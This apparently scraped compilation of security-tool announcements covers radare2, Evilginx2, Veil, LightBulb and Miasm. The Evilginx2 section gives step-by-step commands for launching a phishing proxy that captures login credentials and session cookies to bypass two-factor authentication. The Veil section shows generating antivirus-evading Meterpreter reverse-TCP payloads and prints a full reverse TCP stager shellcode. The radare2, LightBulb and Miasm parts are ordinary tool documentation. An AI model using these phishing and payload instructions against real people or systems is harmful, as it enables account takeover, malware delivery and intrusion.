Radare2 – Unix-Like Reverse Engineering Framework And Commandline Tools Security

r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers…radare2 is portable.Architecturesi386, x86-64, ARM, MIPS, PowerPC, SPARC, RISC-V, SH, m68k, AVR, XAP, System Z, XCore, CR16, HPPA, ARC, Blackfin, Z80, H8/300, V810, V850, CRIS, XAP, PIC, LM32, 8051, 6502, i4004, i8080, Propeller, Tricore, Chip8 LH5801, T8200, GameBoy, SNES, MSP430, Xtensa, NIOS II, Dalvik, WebAssembly, MSIL, EBC, TMS320 (c54x, c55x, c55+, c66), Hexagon, Brainfuck, Malbolge, DCPU16.File FormatsELF, Mach-O, Fatmach-O, PE, PE+, MZ, COFF, OMF, TE, XBE, BIOS/UEFI, Dyldcache, DEX, ART, CGC, Java class, Android boot image, Plan9 executable, ZIMG, MBN/SBL bootloader, ELF coredump, MDMP (Windows minidump), WASM (WebAssembly binary), Commodore VICE emulator, Game Boy (Advance), Nintendo DS ROMs and Nintendo 3DS FIRMs, various filesystems.Operating SystemsWindows (since XP), GNU/Linux, OS X, [Net|Free|Open]BSD, Android, iOS, OSX, QNX, Solaris, Haiku, FirefoxOS.BindingsVala/Genie, Python (2, 3), NodeJS, Lua, Go, Perl, Guile, PHP, Newlisp, Ruby, Java, OCaml…Dependenciesradare2 can be built without any special dependency, just get a working toolchain (gcc, clang, tcc…) and use make.Optionally you can use libewf for loading EnCase disk images.To build the bindings you need latest valabind, g++ and swig2.InstallThe easiest way to install radare2 from git is by running the following command:$ sys/install.shIf you want to install radare2 in the home directory without using root privileges and sudo, simply run:$ sys/user.shBuilding with meson + ninjaIf you don’t already have meson and ninja, you can install them with your distribution package manager or with r2pm:$ r2pm -i mesonIf you already have them installed, you can run this line to compile radare2:$ python ./sys/meson.py –prefix=/usr –shared –installThis method is mostly useful on Windows because the initial building with Makefile is not suitable. If you are lost in any way, just type:$ python ./sys/meson.py –helpUpdateTo update Radare2 system-wide, you don’t need to uninstall or pull. Just re-run:$ sys/install.shIf you installed Radare2 in the home directory, just re-run:$ sys/user.shUninstallIn case of a polluted filesystem, you can uninstall the current version or remove all previous installations:$ make uninstall$ make purgeTo remove all stuff including libraries, use$ make system-purgePackage managerRadare2 has its own package manager – r2pm. Its packages repository is on GitHub too. To start to using it for the first time, you need to initialize packages:$ r2pm initRefresh the packages database before installing any package:$ r2pm updateTo install a package, use the following command:$ r2pm install [package name]BindingsAll language bindings are under the r2-bindings directory. You will need to install swig and valabind in order to build the bindings for Python, Lua, etc..APIs are defined in vapi files which are then translated to swig interfaces, nodejs-ffi or other and then compiled.The easiest way to install the python bindings is to run:$ r2pm install lang-python2 #lang-python3 for python3 bindings$ r2pm install r2api-python$ r2pm install r2pipe-pyIn addition there are r2pipe bindings, which is an API interface to interact with the prompt, passing commands and receivent the output as a string, many commands support JSON output, so its integrated easily with many languages in order to deserialize it into native objects.$ npm install r2pipe # NodeJS$ gem install r2pipe # Ruby$ pip install r2pipe # Python$ opam install radare2 # OCamlAnd also for Go, Rust, Swift, D, .NET, Java, NewLisp, Perl, Haskell, Vala, OCaml, and many more to come!Regression TestsuiteRunning make tests will fetch the radare2-regressions repository and run all the tests in order to verify that no changes break any functionality.We run those tests on every commit, and they are also executed with ASAN and valgrind on different platforms to catch other unwanted ‘features’.DocumentationThere is no formal documentation of r2 yet. Not all commands are compatible with radare1, so the best way to learn how to do stuff in r2 is by reading the examples from the web and appending ‘?’ to every command you are interested in.Commands are small mnemonics of few characters and there is some extra syntax sugar that makes the shell much more pleasant for scripting and interacting with the APIs.You could also checkout the radare2 book.Webserverradare2 comes with an embedded webserver which serves a pure html/js interface that sends ajax queries to the core and aims to implement an usable UI for phones, tablets and desktops.$ r2 -c=H /bin/lsTo use the webserver on Windows, you require a cmd instance with administrator rights. To start the webserver, use the following command in the project root.> radare2.exe -c=H rax2.exePointersWebsite: https://www.radare.org/IRC: irc.freenode.net #radareTelegram: https://t.me/radareMatrix: @radare2:matrix.orgTwitter: @radareorgDownload Radare2

Link: http://feedproxy.google.com/~r/PentestTools/~3/d_ECVYw56ug/radare2-unix-like-reverse-engineering.html

Evilginx2 v2.2.0 – Standalone Man-In-The-Middle Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-Factor Authentication

evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.VideoSee evilginx2 in action here:Evilginx 2 – Next Generation of Phishing 2FA Tokens from breakdev.org on Vimeo.Write-upIf you want to learn more about this phishing technique, I’ve published an extensive blog post about evilginx2 here:https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokensPhishlet Masters – Hall of FamePlease thank the following contributors for devoting their precious time to deliver us fresh phishlets! (in order of first contributions)@cust0msync – Amazon, Reddit@white_fi – Twitterrvrsh3ll @424f424f – CitrixInstallationYou can either use a precompiled binary package for your architecture or you can compile evilginx2 from source.You will need an external server where you’ll host your evilginx2 installation. I personally recommend Digital Ocean and if you follow my referral link, you will get an extra $10 to spend on servers for free.Evilginx runs very well on the most basic Debian 8 VPS.Installing from sourceIn order to compile from source, make sure you have installed GO of version at least 1.10.0 (get it from here) and that $GOPATH environment variable is set up properly (def. $HOME/go).After installation, add this to your ~/.profile, assuming that you installed GO in /usr/local/go:export GOPATH=$HOME/goexport PATH=$PATH:/usr/local/go/bin:$GOPATH/binThen load it with source ~/.profiles.Now you should be ready to install evilginx2. Follow these instructions:sudo apt-get install git makego get -u github.com/kgretzky/evilginx2cd $GOPATH/src/github.com/kgretzky/evilginx2makeYou can now either run evilginx2 from local directory like:sudo ./bin/evilginx -p ./phishlets/or install it globally:sudo make installsudo evilginxInstructions above can also be used to update evilginx2 to the latest version.Installing with DockerYou can launch evilginx2 from within Docker. First build the container:docker build . -t evilginx2Then you can run the container:docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2Phishlets are loaded within the container at /app/phishlets, which can be mounted as a volume for configuration.Installing from precompiled binary packagesGrab the package you want from here and drop it on your box. Then do:unzip .zip -d <package_name>cd <package_name>If you want to do a system-wide install, use the install script with root privileges:chmod 700 ./install.shsudo ./install.shsudo evilginxor just launch evilginx2 from the current directory (you will also need root privileges):chmod 700 ./evilginxsudo ./evilginxUsageIMPORTANT! Make sure that there is no service listening on ports TCP 443, TCP 80 and UDP 53. You may need to shutdown apache or nginx and any service used for resolving DNS that may be running. evilginx2 will tell you on launch if it fails to open a listening socket on any of these ports.By default, evilginx2 will look for phishlets in ./phishlets/ directory and later in /usr/share/evilginx/phishlets/. If you want to specify a custom path to load phishlets from, use the -p <phishlets_dir_path> parameter when launching the tool.Usage of ./evilginx: -debug Enable debug output -developer Enable developer mode (generates self-signed certificates for all hostnames) -p string Phishlets directory pathYou should see evilginx2 logo with a prompt to enter commands. Type help or help <command> if you want to see available commands or more detailed information on them.Getting startedTo get up and running, you need to first do some setting up.At this point I assume, you’ve already registered a domain (let’s call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider’s admin panel to point to your server’s IP (e.g. = = up your server’s domain and IP using following commands:config domain yourdomain.comconfig ip you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):phishlets hostname linkedin my.phishing.hostname.yourdomain.comAnd now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:phishlets enable linkedinYour phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to https://www.google.com):phishlets get-url linkedin https://www.google.comRunning phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use phishlet hide/unhide <phishlet> command.You can monitor captured credentials and session cookies with:sessionsTo get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:sessions <id>The captured session cookie can be copied and imported into Chrome browser, using EditThisCookie extension.Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.CreditsHuge thanks to Simone Margaritelli (@evilsocket) for bettercap and inspiring me to learn GO and rewrite the tool in that language!Download Evilginx2

Link: http://www.kitploit.com/2018/12/evilginx2-v220-standalone-man-in-middle.html

Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.Veil is current under support by @ChrisTruncerSoftware Requirements:The following OSs are officially supported:Debian 8+Kali Linux Rolling 2018.1+The following OSs are likely able to run Veil:Arch LinuxBlackArch LinuxDeepin 15+ElementaryFedora 22+Linux MintParrot SecurityUbuntu 15.10+SetupKali’s Quick Installapt -y install veil/usr/share/veil/config/setup.sh –force –silentGit’s Quick InstallNOTE:Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning.Your package manager may be different to apt.sudo apt-get -y install gitgit clone https://github.com/Veil-Framework/Veil.gitcd Veil/./config/setup.sh –force –silent./config/setup.sh // Setup FilesThis file is responsible for installing all the dependences of Veil. This includes all the WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py for your environment.It includes two optional flags, –force and –silent:–force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.–silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.This can be ran either by doing: ./Veil.py –setup OR ./config/setup.sh –force../config/update-config.py // Regenerating Configuration fileThis will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update).It is important that you are in the ./config/ directory before executing update-config.py. If you are not, /etc/veil/settings.py will be incorrect and when you launch Veil you will see the following: Main Menu 0 payloads loadedDon’t panic. Run either: ./Veil.py –config OR cd ./config/; ./update-config.py.Py2ExeNOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).MANUALLY Install on a Windows Computer (as this isn’t done by Veil’s setup):Python 3.3Py2ExePyCryptoPyWin32Example UsageVeil’s Main Menu:$ ./Veil.py=============================================================================== Veil | [Version]: 3.1.6=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================Main Menu 2 tools loadedAvailable Tools: 1) Evasion 2) OrdnanceAvailable Commands: exit Completely exit Veil info Information on a specific tool list List available tools options Show Veil configuration update Update Veil use Use a specific toolVeil>:Help$ ./Veil.py –helpusage: Veil.py [–list-tools] [-t TOOL] [–update] [–setup] [–config] [–version] [–ip IP] [–port PORT] [–list-payloads] [-p [PAYLOAD]] [-o OUTPUT-NAME] [-c [OPTION=value [OPTION=value …]]] [–msfoptions [OPTION=value [OPTION=value …]]] [–msfvenom ] [–compiler pyinstaller] [–clean] [–ordnance-payload PAYLOAD] [–list-encoders] [-e ENCODER] [-b \x00\x0a..] [–print-stats]Veil is a framework containing multiple tools.[*] Veil Options: –list-tools List Veil’s tools -t TOOL, –tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.) –update Update the Veil framework –setup Run the Veil framework setup file & regenerate the configuration –config Regenerate the Veil framework configuration file –version Displays version and quits[*] Callback Settings: –ip IP, –domain IP IP address to connect back to –port PORT Port number to connect to[*] Payload Settings: –list-payloads Lists all available payloads for that tool[*] Veil-Evasion Options: -p [PAYLOAD] Payload to generate -o OUTPUT-NAME Output file base name for source and compiled binaries -c [OPTION=value [OPTION=value …]] Custom payload module options –msfoptions [OPTION=value [OPTION=value …]] Options for the specified metasploit payload –msfvenom [] Metasploit shellcode to generate (e.g. windows/meterpreter/reverse_tcp etc.) –compiler pyinstaller Compiler option for payload (currently only needed for Python) –clean Clean out payload folders[*] Veil-Ordnance Shellcode Options: –ordnance-payload PAYLOAD Payload type (bind_tcp, rev_tcp, etc.)[*] Veil-Ordnance Encoder Options: –list-encoders Lists all available encoders -e ENCODER, –encoder ENCODER Name of shellcode encoder to use -b \x00\x0a.., –bad-chars \x00\x0a.. Bad characters to avoid –print-stats Print information about the encoded shellcode$Veil Evasion CLI$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py –ip –port 4444=============================================================================== Veil-Evasion=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================runtime/internal/sysruntime/internal/atomicruntimeerrorsinternal/racesync/atomicmathsynciounicode/utf8internal/syscall/windows/sysdllunicode/utf16syscallstrconvreflectencoding/binarycommand-line-arguments=============================================================================== Veil-Evasion=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Language: go [*] Payload Module: go/meterpreter/rev_tcp [*] Executable written to: /var/lib/veil/output/compiled/payload.exe [*] Source code written to: /var/lib/veil/output/source/payload.go [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc$$ file /var/lib/veil/output/compiled/payload.exe/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows$Veil Ordnance CLI$ ./Veil.py -t Ordnance –ordnance-payload rev_tcp –ip –port 4444=============================================================================== Veil-Ordnance=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Payload Name: Reverse TCP Stager (Stage 1) [*] IP Address: [*] Port: 4444 [*] Shellcode Size: 287\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3$Download Veil

Link: http://www.kitploit.com/2018/12/veil-tool-to-generate-metasploit.html

LightBulb Framework – Tools For Auditing WAFS

LightBulb is an open source python framework for auditing web application firewalls and filters.SynopsisThe framework consists of two main algorithms: GOFA: An active learning algorithm that infers symbolic representations of automata in the standard membership/equivalence query model.Active learning algorithms permits the analysis of filter and sanitizer programs remotely, i.e. given only the ability to query the targeted program and observe the output. SFADiff: A black-box differential testing algorithm based on Symbolic Finite Automata (SFA) learningFinding differences between programs with similar functionality is an important security problem as such differences can be used for fingerprinting or creating evasion attacks against security software like Web Application Firewalls (WAFs) which are designed to detect malicious inputs to web applications.MotivationWeb Applications Firewalls (WAFs) are fundamental building blocks of modern application security. For example, the PCI standard for organizations handling credit card transactions dictates that any application facing the internet should be either protected by a WAF or successfully pass a code review process. Nevertheless, despite their popularity and importance, auditing web application firewalls remains a challenging and complex task. Finding attacks that bypass the firewall usually requires expert domain knowledge for a specific vulnerability class. Thus, penetration testers not armed with this knowledge are left with publicly available lists of attack strings, like the XSS Cheat Sheet, which are usually insufficient for thoroughly evaluating the security of a WAF product.Commands UsageMain interface commands: Command Description core Shows available core modules utils Shows available query handlers info Prints module information library Enters library modules Shows available application modules use <module> Enters module start <moduleA> <moduleB> Initiate algorithm help Prints help status Checks and installs required packages complete Prints bash completion command Module commands: Command Description back Go back to main menu info Prints current module information library Enters library options Shows available options define <option> <value> Set an option value start Initiate algoritm complete Prints bash completion command Library commands: Command Description back Go back to main menu info <folder\module> Prints requested module information (folder must be located in lightbulb/data/) cat <folder\module> Prints requested module (folder must be located in lightbulb/data/) modules <folder> Shows available library modules in the requested folder (folder must be located in lightbulb/data/) search <keywords> Searches available library modules using comma separated keywords complete Prints bash completion command InstallationPrepare your systemFirst you have to verify that your system supports flex, python dev, pip and build utilities:For apt platforms (ubuntu, debian…): sudo apt-get install flex sudo apt-get install python-pip sudo apt-get install python-dev sudo apt-get install build-essential(Optional for apt) If you want to add support for MySQL testing: sudo apt-get install libmysqlclient-devFor yum platforms (centos, redhat, fedora…) with already installed the extra packages repo (epel-release): sudo yum install -y python-pip sudo yum install -y python-devel sudo yum install -y wget sudo yum groupinstall -y ‘Development Tools'(Optional for yum) If you want to add support for MySQL testing: sudo yum install -y mysql-devel sudo yum install -y MySQL-pythonInstall LightbulbIn order to use the application without complete package installation:git clone https://github.com/lightbulb-framework/lightbulb-frameworkcd lightbulb-frameworkmakelightbulb statusIn order to perform complete package installation. You can also install it from pip repository. This requires first to install the latest setuptools version:pip install setuptools –upgradepip install lightbulb-frameworklightbulb statusIf you want to use virtualenv:pip install virtualenvvirtualenv envsource env/bin/activatepip install lightbulb-frameworklightbulb statusThe “lightbulb status" command will guide you to install MySQLdb and OpenFst support. If you use virtualenv in linux, the "sudo" command will be required only for the installation of libmysqlclient-dev package.It should be noted that the "lightbulb status" command is not necessary if you are going to use the Burp Extension. The reason is that this command installs the "openfst" and "mysql" bindings and the extension by default is using Jython, which does not support C bindings. It is recommended to use the command only if you want to change the Burp extension configuration from the settings and enable the native support.It is also possible to use a docker instance:docker pull lightbulb/lightbulb-frameworkInstall Burp ExtensionIf you wish to use the new GUI, you can use the extension for the Burp Suite. First you have to setup a working environment with Burp Proxy and JythonDownload the latest Jython from hereFind your local python packages installation folder*Configure Burp Extender to use these values, as shown below*Select the new LightBulb module ("BurpExtension.py") and set the extension type to be "Python"*You can ignore this step, and install the standalone version which contains all the required python packages included. You can download it hereExamplesCheck out the Wiki page for usage examples.ContributorsGeorge ArgyrosIoannis StaisSuman JanaAngelos D. KeromytisAggelos KiayiasReferencesG. Argyros, I. Stais, S. Jana, A. D. Keromytis, and A. Kiayias. 2016. SFADiff: Automated Evasion Attacks and Fingerprinting Using Black-box Differential Automata Learning. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS ’16). ACM, New York, NY, USA, 1690-1701. doi: 10.1145/2976749.2978383G. Argyros, I. Stais, A. Kiayias and A. D. Keromytis, "Back in Black: Towards Formal, Black Box Analysis of Sanitizers and Filters," 2016 IEEE Symposium on Security and Privacy (SP), San Jose, CA, 2016, pp. 91-109. doi: 10.1109/SP.2016.14Download Lightbulb-Framework

Link: http://www.kitploit.com/2018/12/lightbulb-framework-tools-for-auditing.html

Miasm – Reverse Engineering Framework In Python

Miasm is a free and open source (GPLv2) reverse engineering framework. Miasm aims to analyze / modify / generate binary programs. Here is a non exhaustive list of features:Opening / modifying / generating PE / ELF 32 / 64 LE / BE using ElfesteemAssembling / Disassembling X86 / ARM / MIPS / SH4 / MSP430Representing assembly semantic using intermediate languageEmulating using JIT (dynamic code analysis, unpacking, …)Expression simplification for automatic de-obfuscation…See the official blog for more examples and demos.Basic examplesAssembling / DisassemblingImport Miasm x86 architecture:>>> from miasm2.arch.x86.arch import mn_x86>>> from miasm2.core.locationdb import LocationDBGet a location db:>>> loc_db = LocationDB()Assemble a line:>>> l = mn_x86.fromstring(‘XOR ECX, ECX’, loc_db, 32)>>> print lXOR ECX, ECX>>> mn_x86.asm(l)[‘1\xc9’, ‘3\xc9’, ‘g1\xc9’, ‘g3\xc9’]Modify an operand:>>> l.args[0] = mn_x86.regs.EAX>>> print lXOR EAX, ECX>>> a = mn_x86.asm(l)>>> print a[‘1\xc8’, ‘3\xc1’, ‘g1\xc8’, ‘g3\xc1’]Disassemble the result:>>> print mn_x86.dis(a[0], 32)XOR EAX, ECXUsing Machine abstraction:>>> from miasm2.analysis.machine import Machine>>> mn = Machine(‘x86_32’).mn>>> print mn.dis(‘\x33\x30’, 32)XOR ESI, DWORD PTR [EAX]For Mips:>>> mn = Machine(‘mips32b’).mn>>> print mn.dis(’97A30020′.decode(‘hex’), “b")LHU V1, 0x20(SP)Intermediate representationCreate an instruction:>>> machine = Machine(‘arml’)>>> instr = machine.mn.dis(‘002088e0’.decode(‘hex’), ‘l’)>>> print instrADD R2, R8, R0Create an intermediate representation object:>>> ira = machine.ira(loc_db)Create an empty ircfg>>> ircfg = ira.new_ircfg()Add instruction to the pool:>>> ira.add_instr_to_ircfg(instr, ircfg)Print current pool:>>> for lbl, irblock in ircfg.blocks.items():… print irblock.to_string(loc_db)loc_0:R2 = R8 + R0IRDst = loc_4Working with IR, for instance by getting side effects:>>> for lbl, irblock in ircfg.blocks.iteritems():… for assignblk in irblock:… rw = assignblk.get_rw()… for dst, reads in rw.iteritems():… print ‘read: ‘, [str(x) for x in reads]… print ‘written:’, dst… print…read: [‘R8’, ‘R0’]written: R2read: []written: IRDstEmulationGiving a shellcode:00000000 8d4904 lea ecx, [ecx+0x4]00000003 8d5b01 lea ebx, [ebx+0x1]00000006 80f901 cmp cl, 0x100000009 7405 jz 0x100000000b 8d5bff lea ebx, [ebx-1]0000000e eb03 jmp 0x1300000010 8d5b01 lea ebx, [ebx+0x1]00000013 89d8 mov eax, ebx00000015 c3 ret>>> s = ‘\x8dI\x04\x8d[\x01\x80\xf9\x01t\x05\x8d[\xff\xeb\x03\x8d[\x01\x89\xd8\xc3’Import the shellcode thanks to the Container abstraction:>>> from miasm2.analysis.binary import Container>>> c = Container.from_string(s)>>> cDisassembling the shellcode at address 0:>>> from miasm2.analysis.machine import Machine>>> machine = Machine(‘x86_32′)>>> mdis = machine.dis_engine(c.bin_stream)>>> asmcfg = mdis.dis_multiblock(0)>>> for block in asmcfg.blocks:… print block.to_string(asmcfg.loc_db)…loc_0LEA ECX, DWORD PTR [ECX + 0x4]LEA EBX, DWORD PTR [EBX + 0x1]CMP CL, 0x1JZ loc_10-> c_next:loc_b c_to:loc_10loc_10LEA EBX, DWORD PTR [EBX + 0x1]-> c_next:loc_13loc_bLEA EBX, DWORD PTR [EBX + 0xFFFFFFFF]JMP loc_13-> c_to:loc_13loc_13MOV EAX, EBXRETInitializing the Jit engine with a stack:>>> jitter = machine.jitter(jit_type=’python’)>>> jitter.init_stack()Add the shellcode in an arbitrary memory location:>>> run_addr = 0x40000000>>> from miasm2.jitter.csts import PAGE_READ, PAGE_WRITE>>> jitter.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, s)Create a sentinelle to catch the return of the shellcode:def code_sentinelle(jitter): jitter.run = False jitter.pc = 0 return True>>> jitter.add_breakpoint(0x1337beef, code_sentinelle)>>> jitter.push_uint32_t(0x1337beef)Active logs:>>> jitter.set_trace_log()Run at arbitrary address:>>> jitter.init_run(run_addr)>>> jitter.continue_run()RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000000 RDX 0000000000000000RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000RIP 000000004000000040000000 LEA ECX, DWORD PTR [ECX+0x4]RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000….4000000e JMP loc_0000000040000013:0x40000013RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000RIP 000000004000001340000013 MOV EAX, EBXRAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000RIP 000000004000001340000015 RET>>>Interacting with the jitter:>>> jitter.vmad 1230000 size 10000 RW_ hpad 0x2854b40ad 40000000 size 16 RW_ hpad 0x25e0ed0>>> hex(jitter.cpu.EAX)’0x0L’>>> jitter.cpu.ESI = 12Symbolic executionInitializing the IR pool:>>> ira = machine.ira(loc_db)>>> ircfg = ira.new_ircfg_from_asmcfg(asmcfg)Initializing the engine with default symbolic values:>>> from miasm2.ir.symbexec import SymbolicExecutionEngine>>> sb = SymbolicExecutionEngine(ira)Launching the execution:>>> symbolic_pc = sb.run_at(ircfg, 0)>>> print symbolic_pc((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)Same, with step logs (only changes are displayed):>>> sb = SymbolicExecutionEngine(ira, machine.mn.regs.regs_init)>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)Instr LEA ECX, DWORD PTR [ECX + 0x4]Assignblk:ECX = ECX + 0x4________________________________________________________________________________ECX = ECX + 0x4________________________________________________________________________________Instr LEA EBX, DWORD PTR [EBX + 0x1]Assignblk:EBX = EBX + 0x1________________________________________________________________________________EBX = EBX + 0x1ECX = ECX + 0x4________________________________________________________________________________Instr CMP CL, 0x1Assignblk:zf = (ECX[0:8] + -0x1)?(0x0,0x1)nf = (ECX[0:8] + -0x1)[7:8]pf = parity((ECX[0:8] + -0x1) & 0xFF)of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]________________________________________________________________________________af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]pf = parity((ECX + 0x4)[0:8] + 0xFF)zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)ECX = ECX + 0x4of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]EBX = EBX + 0x1________________________________________________________________________________Instr JZ loc_key_1Assignblk:IRDst = zf?(loc_key_1,loc_key_2)EIP = zf?(loc_key_1,loc_key_2)________________________________________________________________________________af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)pf = parity((ECX + 0x4)[0:8] + 0xFF)IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)ECX = ECX + 0x4of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]EBX = EBX + 0x1________________________________________________________________________________>>>Retry execution with a concrete ECX. Here, the symbolic / concolic execution reach the shellcode’s end:>>> from miasm2.expression.expression import ExprInt>>> sb.symbols[machine.mn.regs.ECX] = ExprInt(-3, 32)>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)Instr LEA ECX, DWORD PTR [ECX + 0x4]Assignblk:ECX = ECX + 0x4________________________________________________________________________________af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)pf = parity((ECX + 0x4)[0:8] + 0xFF)IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)ECX = 0x1of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]nf = ((ECX + 